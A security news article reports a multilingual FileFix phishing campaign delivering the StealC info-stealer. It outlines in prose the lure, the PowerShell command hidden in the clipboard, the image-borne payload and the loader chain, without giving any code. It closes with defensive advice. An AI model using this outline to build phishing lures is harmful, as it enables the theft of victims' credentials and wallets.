Husain Parvez
Published on: September 23, 2025
A new wave of FileFix phishing attacks has emerged worldwide, combining advanced obfuscation, steganography, and multilingual lures to deliver StealC malware. According to researchers at Acronis, this is the most sophisticated FileFix campaign observed to date, rapidly expanding less than three months after the attack method was first publicly discussed.
Originally conceived by red team researcher “mr.d0x” in June 2025, FileFix builds on a social engineering concept where victims are tricked into pasting malicious commands into the File Explorer address bar. Unlike the earlier ClickFix method, which relied on the Run dialog, FileFix leverages trusted browser and OS behaviors to appear less suspicious.
The attack starts with a convincing phishing email, often mimicking Facebook’s security team. Targets are redirected to a spoofed support page in their local language, warning that their account may be suspended. Victims are then instructed to “appeal” by copying a supposed file path into File Explorer, except the clipboard actually contains a hidden PowerShell command.
“The observed campaign uses a highly convincing, multilingual phishing site (e.g., fake Facebook Security page), with anti-analysis techniques and advanced obfuscation to evade detection,” said Acronis researcher Eliad Kimhy.
Once executed, the command fetches an image from a Bitbucket repository that contains an embedded second-stage payload. This is decoded into a Go-based loader, which launches shellcode to install StealC, which is an info-stealer capable of targeting credentials, browsers, and crypto wallets.
Researchers noted that the phishing site has been translated into at least 16 languages and uploaded to VirusTotal from countries including the US, Germany, China, and the Philippines. “The adversary behind this attack demonstrated significant investment in tradecraft,” Acronis wrote, citing the campaign’s carefully engineered delivery, infrastructure, and evasion tactics.
The campaign puts focus on the growing use of benign-looking browser features and cloud platforms to bypass detection. Security teams are urged to train users against copying commands from unknown web sources and to monitor the clipboard and PowerShell activity more closely.
